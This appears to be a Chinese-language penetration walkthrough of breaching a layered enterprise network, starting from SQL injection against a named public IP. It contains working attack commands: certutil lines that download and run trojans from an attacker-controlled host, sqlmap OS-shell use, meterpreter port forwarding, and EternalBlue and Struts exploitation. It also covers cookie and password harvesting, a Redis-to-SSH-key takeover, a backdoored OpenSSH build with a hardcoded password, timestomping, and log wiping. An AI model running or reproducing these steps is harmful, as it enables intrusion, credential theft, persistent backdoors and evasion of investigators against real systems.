• 企业网拓扑图

• 获取一层内网控制权

1. 注入点

http://111.47.13.66:88/Content.aspx?ClassId=1&id=5

执行命令可用

sqlmap.py -u "http://111.47.13.66:88/Content.aspx?ClassId=1&id=5" --dbms "mssql"   --os-shell

制作木马文件

1. 下载执行木马

certutil -urlcache -split -f  http://111.47.13.68:8888/rh.exe  c:\\rh.exe  

c:\\rh.exe

1. 下载执行teamviewer

certutil -urlcache -split -f  http://111.47.13.68:8888/tv.exe  c:\\tv.exe

taskkill /f /im tver.exe

1. 会话隔离导致无桌面

1. 下载执行runas降权成功执行

certutil -urlcache -split -f  http://111.47.13.68:8888/rs.exe  c:\\rs.exe

rs.exe winlogon.exe "tv.exe -o 2.txt"

1. 加载mimikatz读取明文密码

1. arp发现IP信息

1. 添加路由转发规则 session1

1. 制作socks代理通道

root@kali:/# vim /etc/proxychains.conf

1. proxychains+nmap访问扫描目标IP

proxychains nmap -sT -sV -Pn -n  192.168.1.222  -p 80,3389,445

1. 将3389端口对外转发

meterpreter > portfwd add -l 2222 -r 192.168.1.222 -p 3389

1. 将目标80端口对外转发做进一步内网渗透

meterpreter > portfwd add -l 2233 -r 192.168.1.222 -p 80

1. 利用s2-045，写webshell并执行木马反弹，成功控制这台2003机器

• 获取二层内网控制权（目标win7）

1. 查看arp信息以及子网信息

1. 添加路由转发规则以及socks通道

1. 转发并扫描目标机器445端口漏洞

1. 使用永恒之蓝进行漏洞利用

1. 注入添加系统账户dll文件

有时会导致目标系统出错重启

1. 转发3389端口进行连接

• 获取二层内网控制权（目标2008）

1. 获取跳板机长期控制权

1. 其他过程略，转发出445端口，使用永恒之蓝进行利用

1. 由于该二层内网机器是断网环境，如果反弹shell则需要一层跳板机做反弹端口转发，这里使用Port2Port.exe，并采用内存执行的方式实现。

1. 生成dll木马文件，并用双子星后门加载，成功回连shell

1. 主机信息收集

1. 调用post/windows/gather/enum_applications模块获取目标主机上的软件安装信息

1. 调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息

1. 调用post/windows/gather/enum_ie后渗透模块，读取目标主机IE浏览器cookies等缓存信息，嗅探目标主机登录过的各类账号密码

命令：run  post/windows/gather/enum_ie

1. 运行getgui模块开启远程桌面并添加账户，

1. 转发3389端口并成功连接

1. 入侵痕迹擦除

在渗透利用过程中难免留下日志等信息痕迹，使用clearev命令擦除痕迹后再跑。

命令：clearev

• 获取二层内网控制权（目标linux）

1. 查看和扫描arp信息发现主机10.10.10.100

1. 配置路由转发并扫描发现6379端口redis可能存在漏洞

1. 本地生成ssh公钥、私钥文件

1. 代理连接方式写入公钥文件到目标redis

1. 访问redis配置公钥到.ssh目标并更名

1. 转发目标22端口，并采用私钥成功登陆

1. 添加ssh后门

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

上传后门版openssh源文件

vi versio.h

vi includes.h

编译安装：

编译过程中可能出现的报错：

configure: error: *** zlib.h missing – please install first or check config.log

#yum install zlib-devel

configure: error: *** Can’t find recent OpenSSL libcrypto (see config.log for details) ***

#yum install openssl openssl-devel
shell-# ./configure --prefix=/usr --sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/

修改文件时间:
touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config

重启服务
shell-# /etc/init.d/sshd restart

登入后门：
ssh -l root IP
password：13995845381
echo >/root/.bash_history //清空操作日志